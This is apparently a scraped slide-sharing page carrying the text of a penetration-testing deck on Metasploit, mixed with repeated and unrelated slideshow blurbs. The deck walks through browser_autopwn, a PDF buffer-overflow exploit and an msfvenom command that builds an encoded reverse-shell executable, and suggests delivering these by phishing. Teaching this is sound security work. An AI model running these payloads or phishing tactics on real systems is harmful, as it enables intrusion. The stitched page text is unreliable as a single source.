Metasploit is a vulnerability and exploitation framework used by security professionals to ease the burden of performing security assessments. It contains modules divided into exploits, auxiliary, payloads, and post exploitation that allow penetration testing functionality. Some techniques demonstrated in the document include browser, PDF, and executable exploitation using Metasploit payloads to gain remote access shells on target systems.
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
Metasploit framework can also be called as ‘Swiss Army knife ’ of penetration testers as it provides multiple exploit, customization, easy to redevelop according to the requirements of the system . To secure our system and prevent it from any type of threats , we should perform the penetration testing.
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
About Port Scanning
Used Nmap and Shadow Security scanner for the best outputs.
A Detailed description on performing the port scanning mostly for the network administrators.
Why to perform? How to perform? Where to perform? these areas are taken into consideration and presented with best output results using tools "nmap scanner" and "shadow security scanner".
Metasploit framework can also be called as ‘Swiss Army knife ’ of penetration testers as it provides multiple exploit, customization, easy to redevelop according to the requirements of the system . To secure our system and prevent it from any type of threats , we should perform the penetration testing.
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
About Port Scanning
Used Nmap and Shadow Security scanner for the best outputs.
A Detailed description on performing the port scanning mostly for the network administrators.
Why to perform? How to perform? Where to perform? these areas are taken into consideration and presented with best output results using tools "nmap scanner" and "shadow security scanner".
Introduction to metasploit framework
01.History of metasploit
02.Metasploit Design and architecture
03.Metasploit Editions
04.Metasploit Interface
05.Basic commands and foot-printing modules
Anonymous club of BMSCE, Talk and Demo on exploits on the Metasploit Framework and building Trojans using Msfvenom . By Siddharth.K (tech Head of anonymous club BMSCE)
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Orkestra
UIIN Conference, Madrid, 27-29 May 2024
James Wilson, Orkestra and Deusto Business School
Emily Wise, Lund University
Madeline Smith, The Glasgow School of Art
Acorn Recovery: Restore IT infra within minutesIP ServerOne
Introducing Acorn Recovery as a Service, a simple, fast, and secure managed disaster recovery (DRaaS) by IP ServerOne. A DR solution that helps restore your IT infra within minutes.
This presentation by Morris Kleiner (University of Minnesota), was made during the discussion “Competition and Regulation in Professions and Occupations” held at the Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found out at oe.cd/crps.
This presentation was uploaded with the author’s consent.
Have you ever wondered how search works while visiting an e-commerce site, internal website, or searching through other types of online resources? Look no further than this informative session on the ways that taxonomies help end-users navigate the internet! Hear from taxonomists and other information professionals who have first-hand experience creating and working with taxonomies that aid in navigation, search, and discovery across a range of disciplines.
0x01 - Newton's Third Law: Static vs. Dynamic AbusersOWASP Beja
f you offer a service on the web, odds are that someone will abuse it. Be it an API, a SaaS, a PaaS, or even a static website, someone somewhere will try to figure out a way to use it to their own needs. In this talk we'll compare measures that are effective against static attackers and how to battle a dynamic attacker who adapts to your counter-measures.
About the Speaker
===============
Diogo Sousa, Engineering Manager @ Canonical
An opinionated individual with an interest in cryptography and its intersection with secure software development.
2. AGENDA
• Introduction to Metasploit
• History of Metasploit
• Exploit
• Payloads
• Auxiliary
• Network Reconnaissance with Metasploit
• Metasploit Payload
• Meterpreter and Post Exploitation
• Client-side Exploitation – Browser , pdf and exe
• References
3.
4. Introduction to
Metasploit
• Vulnerability and exploitation framework designed to ease the burden on
security professionals when it comes to performing security assessments.
• One of the single most useful auditing tools freely available to security
professionals today
• Contains an extensive library of "modules.“
• Each module has a function, and they are divided up into "exploits",
"auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops.
5.
6. History
• Created by H. D. Moore in 2003 as a portable network tool using Perl
• In April, 2004 - With the help of Spoonm, HD released a total rewrite of the
project, Metasploit 2.0 (19 exploits and 27 payloads).
• By 2007, the Metasploit Framework had been completely rewritten in Ruby
• On October 21, 2009, it had been acquired by Rapid7
7. Exploits
• Vectors for Penetrating the systems .
• A software program that has been developed to attack an asset by
taking advantage of a vulnerability.
• Objective of many exploits is to gain control over an asset .
8. Payloads
• A payload in metasploit refers to an exploit module.
• Each exploit can be attached with various payloads like reverse or bind
shells, the meterpreter shell etc.
• A payload is a piece of code to be executed through said exploit.
9. Auxiliary
• Metasploit Framework includes hundreds of auxiliary modules that
perform scanning, fuzzing, sniffing, and much more.
• Although these modules will not give you a shell, they are extremely
valuable when conducting a penetration test.
10. Network Reconnaissance
with Metasploit
• Foundation for any successful penetration test is solid
reconnaissance .
• Gathering enough Information regarding the Target .
• Some examples of Reconnaissance is using nmap tool for port
scanning and identifying services running on the target system .
11. Metasploit Payloads
• Mainly three different types of payload modules in the Metasploit
Framework: Singles, Stagers, and Stages.
• Singles -Self-Contained and Completely Standalone which can be something
as simple as adding a user to the target system or running calc.exe.
• Stagers -Setup a network connection between the attacker and victim and are
designed to be small and reliable
• Stages -payload components that are downloaded by Stagers modules.
Stages provide advanced features with no size limits such as Meterpreter,
VNC Injection, and the iPhone ‘ipwn’ Shell.
12. Meterpreter and Post
Exploitation
• Meterpreter is an advanced, dynamically extensible payload that uses in-
memory DLL injection stagers and is extended over the network at runtime.
• Meterpreter communicates over the stager socket and provides a
comprehensive client-side Ruby API.
• Post-Exploitation is done after the exploitation in-order to maintain the
control of the compromised system for future use .
• Post-Exploitation includes setting up a backdoor to maintain more
permanent system access and covering the tracks .
13. Client-side Exploitation
• Client side attacks require user-interaction such as enticing them to
click a link, open a document, or somehow get to your malicious
website.
• These types of attacks are often delivered by using cleverly worded
emails, sometimes with attachments such as Microsoft Word and PDF
documents.
• Often the attacks is used in conjunction with social engineering
techniques by way of phishing or spear phishing attacks.
14. Browser Exploitation
• Browser Exploitation involves running a browser exploit inorder to
take advantage of a flaw or vulnerability in an operating system or
piece of software with the intent to breach browser security to alter a
user's browser settings without their knowledge.
• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary
code.
15. In order to use this attack we have to open
the metasploit framework and to use
the browser_autopwn module.
16. Set up the LHOST with your IP
address,the SRVPORT with the port 80
(otherwise the link that we have to send to
the user must me in the format IP:8080)
and the URIPATH with / in order to
prevent metasploit to set up random URL’s.
17. Now we can share the link through our email to our
client employees.If any user opens the malicious link,the
autopwn module will try all these exploits in order to see if it
can break into the client.If the browser is vulnerable to any of
these exploits meterpreter sessions will open.
18. Pdf Exploitation
• Exploiting a system using attacker’s crafted pdf file .
• Mainly targets the system whose pdf reader is vulnerable to some sort
of attacks like buffer overflow .
• Pdf is distributed to the victims by social engineering techniques .
• Sometimes the pdf application fails to perform adequate boundary
checks on user-supplied data then thus system can be attacked by
using pdf exploitation technique .
19. We are going to be using the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow Vulnerability.
20. Once we have all the options set the way we want, we run “exploit” to create our malicious file.
We will use msfconsole to set up our multi handler listener
21. Clicking the file opens
Adobe but shows a
greyed out window that
never reveals a PDF.
Instead, on the attackers
machine a meterpreter
session is opened and
thus we have the shell on
the victim system .
22. Exe Exploitation
• Generate an executable from a Metasploit payload inorder to target a
victim through malicious executable file .
• If you can get a user to run your payload for you, there is no reason to
go through the trouble of exploiting any software.
• Generate a reverse shell payload, execute it on a remote system, and
get our shell.
• Best way to do this is to backdoor an executable by embedding it with
malicious payloads .
23. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b
"x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
use ‘multi/handler’ which is a stub that handles exploits launched outside of the framework.
run ‘exploit’ for the multi/handler and execute our generated executable on the victim.
24. The generated executable
can be distributed using
some sort of social
engineering attacks thus as
soon as the executable is
executed on the victim
system it presents the
attacker with the shell of the
victim system .